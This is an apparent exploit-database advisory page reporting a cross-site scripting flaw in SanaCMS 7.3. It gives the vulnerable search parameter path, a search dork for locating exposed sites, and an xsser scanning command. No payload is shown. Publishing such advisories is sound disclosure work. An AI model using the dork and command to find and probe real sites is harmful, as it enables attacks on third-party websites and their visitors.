Sandata SanaCMS 7.3 Cross Site Scripting

2017.02.08
Credit: Hosein Askari
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

##### #Exploit Title: SANADATA | SanaCMS 7.3 Cross Site Scripting #Exploit Author: Hosein Askari #Vendor HomePage: https://www.sanadata.com/| #Version : 7.3 #Dork : intext:"SANADATA | SanaCMS 7.3" #Tested on:Parrot OS #Date: 3-2-2017 #Category: webapps #Vulnerability Path : http://127.0.0.1/fa/index.asp?p=search&search= #Command For Testing: #xsser -u "http://127.0.0.1/en/index.asp?p=search&search=" # Author Mail :hosein.askari@aol.com #####


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top